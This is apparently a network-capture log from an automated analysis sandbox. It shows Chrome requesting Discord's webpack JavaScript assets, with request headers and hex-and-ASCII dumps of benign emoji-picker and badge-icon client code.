                                                                          2023-12-10 16:45:12 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 63 2d 57 65 62 73 6f 63 6b 65 74 2d 56 65 72 73 69 6f 6e 3a 20 31 33 0d 0a 58 2d 43 6f 6e 74 65 6e
                                                                          Data Ascii: HTTP/1.1 400 Bad RequestDate: Sun, 10 Dec 2023 16:45:12 GMTContent-Type: text/plain; charset=utf-8Content-Length: 12Connection: closeAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Origin: *Sec-Websocket-Version: 13X-Conten
                                                                          2023-12-10 16:45:12 UTC12INData Raw: 42 61 64 20 52 65 71 75 65 73 74 0a
                                                                          Data Ascii: Bad Request


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          260192.168.2.549995162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:12 UTC866OUTGET /assets/34426.aefa163dd8b10b7ac8cc.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Pvcmd6a6.0o4HjOJPmeojkgEm6NiaF1BbolJHbj9VMY-1702226711747-0-604800000
                                                                          2023-12-10 16:45:12 UTC977INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 34 35 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 39 39 66 35 32 35 63 37 31 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:12 GMTContent-Type: application/javascriptContent-Length: 16457Connection: closeCF-Ray: 8336f4f99f525c71-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 33 34 34 32 36 22 5d 2c 7b 35 36 34 39 36 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 69 2e 72 28 74 29 2c 69 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 6e 3d 69 28 22 38 36 32 32 30 35 22 29 3b 6c 65 74 20 72 3d 28 30 2c 6e 2e 63 72 65 61 74 65 45 78 70 65 72 69 6d 65 6e 74 29 28 7b 6b 69 6e 64 3a 22 75 73 65 72 22 2c 69 64 3a 22 32 30 32 33 2d 30 31 5f 65 6d 6f 6a 69 5f 64 69 73 63 6f 76 65 72 79 5f 62 61 63 6b 66
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["34426"],{564967:function(e,t,i){"use strict";i.r(t),i.d(t,{default:function(){return o}});var n=i("862205");let r=(0,n.createExperiment)({kind:"user",id:"2023-01_emoji_discovery_backf
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 61 63 65 68 6f 6c 64 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 71 7d 7d 29 2c 69 28 22 38 34 33 37 36 32 22 29 2c 69 28 22 34 32 34 39 37 33 22 29 2c 69 28 22 32 32 32 30 30 37 22 29 2c 69 28 22 38 30 38 36 35 33 22 29 2c 69 28 22 37 38 31 37 33 38 22 29 3b 76 61 72 20 6e 3d 69 28 22 38 38 34 36 39 31 22 29 3b 69 28 22 33 37 35 31 32 38 22 29 3b 76 61 72 20 72 3d 69 28 22 34 34 36 36 37 34 22 29 2c 6f 3d 69 28 22 37 31 36 32 34 31 22 29 2c 61 3d 69 28 22 33 38 35 39 37 36 22 29 2c 73 3d 69 28 22 38 35 38 36 31 39 22 29 2c 75 3d 69 28 22 36 33 30 34 30 30 22 29 2c 6c 3d 69 28 22 32 35 32 39 33 31 22 29 2c 45 3d 69 28 22 31 36 36 34 36 35 22 29 2c 64 3d 69 28 22 38 37 32 31 37 33 22 29 2c 63 3d 69 28 22 33 30 35 39 36 31 22 29 2c 6d 3d
                                                                          Data Ascii: aceholder:function(){return q}}),i("843762"),i("424973"),i("222007"),i("808653"),i("781738");var n=i("884691");i("375128");var r=i("446674"),o=i("716241"),a=i("385976"),s=i("858619"),u=i("630400"),l=i("252931"),E=i("166465"),d=i("872173"),c=i("305961"),m=
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 54 79 70 65 73 2e 47 55 49 4c 44 26 26 28 72 3d 63 2e 64 65 66 61 75 6c 74 2e 67 65 74 47 75 69 6c 64 28 61 29 29 2c 6e 75 6c 6c 3d 3d 72 29 63 6f 6e 74 69 6e 75 65 3b 6c 65 74 20 73 3d 6e 75 6c 6c 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 5b 72 2e 69 64 5d 3b 69 66 28 6e 75 6c 6c 3d 3d 73 7c 7c 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 7c 7c 6e 75 6c 6c 21 3d 74 26 26 73 2e 65 76 65 72 79 28 69 3d 3e 66 2e 64 65 66 61 75 6c 74 2e 69 73 45 6d 6f 6a 69 46 69 6c 74 65 72 65 64 28 7b 65 6d 6f 6a 69 3a 69 2c 63 68 61 6e 6e 65 6c 3a 74 2c 69 6e 74 65 6e 74 69 6f 6e 3a 65 2c 63 61 6e 56 69 65 77 41 6e 64 55 73 65 50 61 63 6b 45 6d 6f 6a 69 3a 41 7d 29 29 29 63 6f 6e 74 69 6e 75 65 3b 6c 65 74 20 6c 3d 6e 75 6c 6c 3b 69 66 28 6f 3d 3d 3d 43 2e 45 6d 6f 6a 69 43 61 74 65 67
                                                                          Data Ascii: Types.GUILD&&(r=c.default.getGuild(a)),null==r)continue;let s=null==n?void 0:n[r.id];if(null==s||0===s.length||null!=t&&s.every(i=>f.default.isEmojiFiltered({emoji:i,channel:t,intention:e,canViewAndUsePackEmoji:A})))continue;let l=null;if(o===C.EmojiCateg
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 67 65 74 47 75 69 6c 64 49 64 28 29 29 21 3d 6e 75 6c 6c 3b 5f 2e 64 65 66 61 75 6c 74 2e 74 72 61 63 6b 28 79 2e 41 6e 61 6c 79 74 69 63 45 76 65 6e 74 73 2e 50 52 45 4d 49 55 4d 5f 50 52 4f 4d 4f 54 49 4f 4e 5f 4f 50 45 4e 45 44 2c 7b 6c 6f 63 61 74 69 6f 6e 5f 70 61 67 65 3a 74 3f 79 2e 41 6e 61 6c 79 74 69 63 73 50 61 67 65 73 2e 47 55 49 4c 44 5f 43 48 41 4e 4e 45 4c 3a 79 2e 41 6e 61 6c 79 74 69 63 73 50 61 67 65 73 2e 44 4d 5f 43 48 41 4e 4e 45 4c 2c 6c 6f 63 61 74 69 6f 6e 5f 73 65 63 74 69 6f 6e 3a 6e 75 6c 6c 21 3d 65 3f 79 2e 41 6e 61 6c 79 74 69 63 73 53 65 63 74 69 6f 6e 73 2e 45 4d 4f 4a 49 5f 50 49 43 4b 45 52 5f 50 4f 50 4f 55 54 3a 79 2e 41 6e 61 6c 79 74 69 63 73 53 65 63 74 69 6f 6e 73 2e 43 55 53 54
                                                                          Data Ascii: =e?void 0:e.getGuildId())!=null;_.default.track(y.AnalyticEvents.PREMIUM_PROMOTION_OPENED,{location_page:t?y.AnalyticsPages.GUILD_CHANNEL:y.AnalyticsPages.DM_CHANNEL,location_section:null!=e?y.AnalyticsSections.EMOJI_PICKER_POPOUT:y.AnalyticsSections.CUST
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 79 74 69 63 45 76 65 6e 74 73 2e 45 58 50 52 45 53 53 49 4f 4e 5f 50 49 43 4b 45 52 5f 45 58 50 52 45 53 53 49 4f 4e 5f 46 4f 43 55 53 2c 7b 65 78 70 72 65 73 73 69 6f 6e 5f 73 65 63 74 69 6f 6e 3a 6e 75 6c 6c 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 74 6f 53 74 72 69 6e 67 28 29 2c 6e 65 77 6c 79 5f 61 64 64 65 64 5f 68 69 67 68 6c 69 67 68 74 3a 61 2c 65 6d 6f 6a 69 5f 69 64 3a 74 2e 69 64 2c 65 6d 6f 6a 69 5f 6e 61 6d 65 3a 74 2e 6e 61 6d 65 2c 65 6d 6f 6a 69 5f 61 6e 69 6d 61 74 65 64 3a 74 2e 61 6e 69 6d 61 74 65 64 2c 65 6d 6f 6a 69 5f 62 61 63 6b 66 69 6c 6c 65 64 3a 72 2c 65 6d 6f 6a 69 5f 70 6f 73 69 74 69 6f 6e 3a 6e 7d 29 7d 2c 6b 3d 65 3d 3e 7b 76 61 72 20 74 3b 6c 65 74 20 69 2c 7b 65 6d 6f 6a 69 3a 6e 2c 6c 6f 63 61 74 69 6f 6e 3a 72 2c 70 69
                                                                          Data Ascii: yticEvents.EXPRESSION_PICKER_EXPRESSION_FOCUS,{expression_section:null==i?void 0:i.toString(),newly_added_highlight:a,emoji_id:t.id,emoji_name:t.name,emoji_animated:t.animated,emoji_backfilled:r,emoji_position:n})},k=e=>{var t;let i,{emoji:n,location:r,pi
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 69 6f 6e 50 69 63 6b 65 72 56 69 65 77 54 79 70 65 2e 45 4d 4f 4a 49 2c 65 78 70 72 65 73 73 69 6f 6e 5f 69 64 3a 69 2e 69 64 2c 65 78 70 72 65 73 73 69 6f 6e 5f 6e 61 6d 65 3a 72 2c 65 78 70 72 65 73 73 69 6f 6e 5f 67 75 69 6c 64 5f 69 64 3a 44 28 69 29 2c 65 78 70 72 65 73 73 69 6f 6e 5f 70 61 63 6b 5f 69 64 3a 69 2e 74 79 70 65 3d 3d 3d 73 2e 45 6d 6f 6a 69 54 79 70 65 73 2e 50 41 43 4b 3f 69 2e 70 61 63 6b 49 64 3a 76 6f 69 64 20 30 2c 69 73 5f 63 75 73 74 6f 6d 3a 6e 75 6c 6c 21 3d 69 2e 69 64 2c 69 73 5f 61 6e 69 6d 61 74 65 64 3a 69 2e 61 6e 69 6d 61 74 65 64 7d 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 73 2e 45 6d 6f 6a 69 54 79 70 65 73 2e 50 41 43 4b 3f 65 2e 67 75 69 6c 64 49 64 3a 76 6f
                                                                          Data Ascii: ionPickerViewType.EMOJI,expression_id:i.id,expression_name:r,expression_guild_id:D(i),expression_pack_id:i.type===s.EmojiTypes.PACK?i.packId:void 0,is_custom:null!=i.id,is_animated:i.animated})};function D(e){return e.type!==s.EmojiTypes.PACK?e.guildId:vo
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 41 56 45 4c 3b 63 61 73 65 20 43 2e 45 6d 6f 6a 69 43 61 74 65 67 6f 72 69 65 73 2e 50 52 45 4d 49 55 4d 5f 55 50 53 45 4c 4c 3a 72 65 74 75 72 6e 20 53 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 45 4d 4f 4a 49 5f 43 41 54 45 47 4f 52 59 5f 50 52 45 4d 49 55 4d 5f 55 50 53 45 4c 4c 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 69 3f 53 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 45 4d 4f 4a 49 5f 43 41 54 45 47 4f 52 59 5f 50 41 43 4b 2e 66 6f 72 6d 61 74 28 7b 70 61 63 6b 4e 61 6d 65 3a 69 7d 29 3a 6e 75 6c 6c 21 3d 74 3f 74 3a 65 7d 7d 2c 4c 3d 65 3d 3e 65 21 3d 3d 4f 2e 45 6d 6f 6a 69 49 6e 74 65 6e 74 69 6f 6e 2e 43 4f 4d 4d 55 4e 49 54 59 5f 43 4f 4e 54 45 4e 54 5f 4f 4e 4c 59 3b 66 75 6e 63 74 69 6f 6e 20 4a
                                                                          Data Ascii: AVEL;case C.EmojiCategories.PREMIUM_UPSELL:return S.default.Messages.EMOJI_CATEGORY_PREMIUM_UPSELL;default:return null!=i?S.default.Messages.EMOJI_CATEGORY_PACK.format({packName:i}):null!=t?t:e}},L=e=>e!==O.EmojiIntention.COMMUNITY_CONTENT_ONLY;function J
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 61 75 6c 74 2e 67 65 74 44 69 73 61 6d 62 69 67 75 61 74 65 64 45 6d 6f 6a 69 43 6f 6e 74 65 78 74 28 65 29 2e 69 73 46 61 76 6f 72 69 74 65 45 6d 6f 6a 69 57 69 74 68 6f 75 74 46 65 74 63 68 69 6e 67 4c 61 74 65 73 74 28 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 59 28 65 29 7b 72 65 74 75 72 6e 20 6e 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 64 2e 46 72 65 63 65 6e 63 79 55 73 65 72 53 65 74 74 69 6e 67 73 41 63 74 69 6f 6e 43 72 65 61 74 6f 72 73 2e 6c 6f 61 64 49 66 4e 65 63 65 73 73 61 72 79 28 29 7d 2c 5b 5d 29 2c 28 30 2c 72 2e 75 73 65 53 74 61 74 65 46 72 6f 6d 53 74 6f 72 65 73 41 72 72 61 79 29 28 5b 61 2e 64 65 66 61 75 6c 74 5d 2c 28 29 3d 3e 61 2e 64 65 66 61 75 6c 74 2e 67 65 74 44 69 73 61 6d 62 69 67 75 61 74 65 64 45 6d 6f 6a 69 43 6f
                                                                          Data Ascii: ault.getDisambiguatedEmojiContext(e).isFavoriteEmojiWithoutFetchingLatest(t))}function Y(e){return n.useEffect(()=>{d.FrecencyUserSettingsActionCreators.loadIfNecessary()},[]),(0,r.useStateFromStoresArray)([a.default],()=>a.default.getDisambiguatedEmojiCo
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 69 28 22 31 33 30 33 30 22 29 3b 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 76 61 72 20 74 3b 6c 65 74 7b 69 6e 74 65 6e 74 69 6f 6e 3a 69 2c 63 6f 6e 74 61 69 6e 65 72 57 69 64 74 68 3a 66 2c 72 6f 77 53 69 7a 65 3a 67 2c 69 73 42 75 72 73 74 52 65 61 63 74 69 6f 6e 3a 70 2c 61 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 3a 49 7d 3d 65 2c 43 3d 73 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 68 61 6e 6e 65 6c 28 75 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 68 61 6e 6e 65 6c 49 64 28 29 29 2c 79 3d 6e 75 6c 6c 3d 3d 43 3f 76 6f 69 64 20 30 3a 43 2e 67 65 74 47 75 69 6c 64 49 64 28 29 2c 4f 3d 72 2e 64 65 66 61 75 6c 74 2e 65 6d 6f 6a 69 46 72 65 63 65 6e 63 79 57 69 74 68 6f 75 74 46 65 74 63 68 69 6e 67 4c 61 74 65 73 74 2e 66 72 65 71 75 65 6e 74 6c 79 2e 73 6c 69
                                                                          Data Ascii: i("13030");function f(e){var t;let{intention:i,containerWidth:f,rowSize:g,isBurstReaction:p,analyticsObject:I}=e,C=s.default.getChannel(u.default.getChannelId()),y=null==C?void 0:C.getGuildId(),O=r.default.emojiFrecencyWithoutFetchingLatest.frequently.sli


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          261192.168.2.549996162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:12 UTC866OUTGET /assets/41831.ad048c0163425aea4d2e.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=RZZse.6bbxsMOJ1oPVCsZDXtOAY_lqb8p879sJhPwp4-1702226712142-0-604800000
                                                                          2023-12-10 16:45:12 UTC1120INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 37 38 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 61 37 38 61 35 35 63 37 30 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:12 GMTContent-Type: application/javascriptContent-Length: 15789Connection: closeCF-Ray: 8336f4fa78a55c70-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:12 UTC249INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 34 31 38 33 31 22 5d 2c 7b 34 30 30 30 33 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6c 2c 43 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 43 2e 72 28 6c 29 2c 43 2e 64 28 6c 2c 7b 53 74 61 66 66 42 61 64 67 65 49 63 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 7d 29 3b 76 61 72 20 74 3d 43 28 22 33 37 39 38 33 22 29 3b 43 28 22 38 38 34 36 39 31 22 29 3b 76 61 72 20 4c 3d 43 28 22 36 36 39 34 39 31 22 29 2c 73 3d 43 28 22 37 35 31 39 36 22 29 3b 6c 65 74 20 61 3d 65 3d 3e 7b 6c 65 74 7b 77 69 64 74 68 3a
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["41831"],{400033:function(e,l,C){"use strict";C.r(l),C.d(l,{StaffBadgeIcon:function(){return a}});var t=C("37983");C("884691");var L=C("669491"),s=C("75196");let a=e=>{let{width:
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 6c 3d 32 34 2c 68 65 69 67 68 74 3a 43 3d 32 34 2c 63 6f 6c 6f 72 3a 61 3d 4c 2e 64 65 66 61 75 6c 74 2e 63 6f 6c 6f 72 73 2e 49 4e 54 45 52 41 43 54 49 56 45 5f 4e 4f 52 4d 41 4c 2c 63 6f 6c 6f 72 43 6c 61 73 73 3a 72 3d 22 22 2c 2e 2e 2e 64 7d 3d 65 3b 72 65 74 75 72 6e 28 30 2c 74 2e 6a 73 78 73 29 28 22 73 76 67 22 2c 7b 2e 2e 2e 28 30 2c 73 2e 64 65 66 61 75 6c 74 29 28 64 29 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 6c 2c 68 65 69 67 68 74 3a 43 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 74 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69 6e 67 22 3d
                                                                          Data Ascii: l=24,height:C=24,color:a=L.default.colors.INTERACTIVE_NORMAL,colorClass:r="",...d}=e;return(0,t.jsxs)("svg",{...(0,s.default)(d),xmlns:"http://www.w3.org/2000/svg",width:l,height:C,fill:"none",viewBox:"0 0 24 24",children:[(0,t.jsx)("path",{fill:"string"=
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 28 22 34 39 31 31 31 22 29 2c 52 3d 43 28 22 37 38 32 33 34 30 22 29 2c 70 3d 43 28 22 34 36 35 38 33 35 22 29 3b 28 4c 3d 74 7c 7c 28 74 3d 7b 7d 29 29 5b 4c 2e 50 41 52 54 4e 45 52 45 44 3d 30 5d 3d 22 50 41 52 54 4e 45 52 45 44 22 2c 4c 5b 4c 2e 53 54 41 46 46 3d 31 5d 3d 22 53 54 41 46 46 22 2c 4c 5b 4c 2e 56 45 52 49 46 49 45 44 3d 32 5d 3d 22 56 45 52 49 46 49 45 44 22 2c 4c 5b 4c 2e 56 45 52 49 46 49 45 44 5f 41 4e 44 5f 50 41 52 54 4e 45 52 45 44 3d 33 5d 3d 22 56 45 52 49 46 49 45 44 5f 41 4e 44 5f 50 41 52 54 4e 45 52 45 44 22 2c 4c 5b 4c 2e 56 45 52 49 46 49 45 44 5f 41 4e 44 5f 48 55 42 3d 34 5d 3d 22 56 45 52 49 46 49 45 44 5f 41 4e 44 5f 48 55 42 22 2c 4c 5b 4c 2e 48 55 42 3d 35 5d 3d 22 48 55 42 22 2c 4c 5b 4c 2e 4e 4f 4e 45 3d 36 5d 3d 22
                                                                          Data Ascii: ("49111"),R=C("782340"),p=C("465835");(L=t||(t={}))[L.PARTNERED=0]="PARTNERED",L[L.STAFF=1]="STAFF",L[L.VERIFIED=2]="VERIFIED",L[L.VERIFIED_AND_PARTNERED=3]="VERIFIED_AND_PARTNERED",L[L.VERIFIED_AND_HUB=4]="VERIFIED_AND_HUB",L[L.HUB=5]="HUB",L[L.NONE=6]="
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 65 73 2e 56 45 52 49 46 49 45 44 29 26 26 6c 2e 68 61 73 28 45 2e 47 75 69 6c 64 46 65 61 74 75 72 65 73 2e 48 55 42 29 3f 74 68 69 73 2e 72 65 6e 64 65 72 42 61 64 67 65 28 34 2c 63 2e 64 65 66 61 75 6c 74 2c 70 2e 76 65 72 69 66 69 65 64 48 75 62 29 3a 6c 2e 68 61 73 28 45 2e 47 75 69 6c 64 46 65 61 74 75 72 65 73 2e 48 55 42 29 3f 74 68 69 73 2e 72 65 6e 64 65 72 42 61 64 67 65 28 35 2c 63 2e 64 65 66 61 75 6c 74 2c 70 2e 68 75 62 29 3a 6c 2e 68 61 73 28 45 2e 47 75 69 6c 64 46 65 61 74 75 72 65 73 2e 56 45 52 49 46 49 45 44 29 26 26 6c 2e 68 61 73 28 45 2e 47 75 69 6c 64 46 65 61 74 75 72 65 73 2e 50 41 52 54 4e 45 52 45 44 29 3f 74 68 69 73 2e 72 65 6e 64 65 72 42 61 64 67 65 28 33 2c 68 2e 64 65 66 61 75 6c 74 2c 70 2e 76 65 72 69 66 69 65 64 29 3a
                                                                          Data Ascii: es.VERIFIED)&&l.has(E.GuildFeatures.HUB)?this.renderBadge(4,c.default,p.verifiedHub):l.has(E.GuildFeatures.HUB)?this.renderBadge(5,c.default,p.hub):l.has(E.GuildFeatures.VERIFIED)&&l.has(E.GuildFeatures.PARTNERED)?this.renderBadge(3,h.default,p.verified):
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 2e 34 30 33 30 34 20 39 2e 39 39 39 39 39 20 34 2e 36 36 36 36 36 20 39 2e 39 39 39 39 39 43 33 2e 39 33 30 32 38 20 39 2e 39 39 39 39 39 20 33 2e 33 33 33 33 33 20 31 30 2e 35 39 36 39 20 33 2e 33 33 33 33 33 20 31 31 2e 33 33 33 33 5a 22 2c 66 69 6c 6c 3a 73 7d 29 2c 28 30 2c 74 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 38 20 31 32 2e 36 36 36 37 43 37 2e 32 36 33 36 32 20 31 32 2e 36 36 36 37 20 36 2e 36 36 36 36 36 20 31 32 2e 30 36 39 37 20 36 2e 36 36 36 36 36 20 31 31 2e 33 33 33 33 43 36 2e 36 36 36 36 36 20 31 30 2e 35 39 36 39 20 37 2e 32 36 33 36 32 20 39 2e 39 39 39 39 39 20 38 20 39 2e 39 39 39 39 39 43 38 2e 37 33 36 33 37 20 39 2e 39 39 39 39 39 20 39 2e 33 33 33 33 33 20 31 30 2e 35 39 36 39 20 39 2e 33 33 33 33 33 20 31 31 2e
                                                                          Data Ascii: .40304 9.99999 4.66666 9.99999C3.93028 9.99999 3.33333 10.5969 3.33333 11.3333Z",fill:s}),(0,t.jsx)("path",{d:"M8 12.6667C7.26362 12.6667 6.66666 12.0697 6.66666 11.3333C6.66666 10.5969 7.26362 9.99999 8 9.99999C8.73637 9.99999 9.33333 10.5969 9.33333 11.
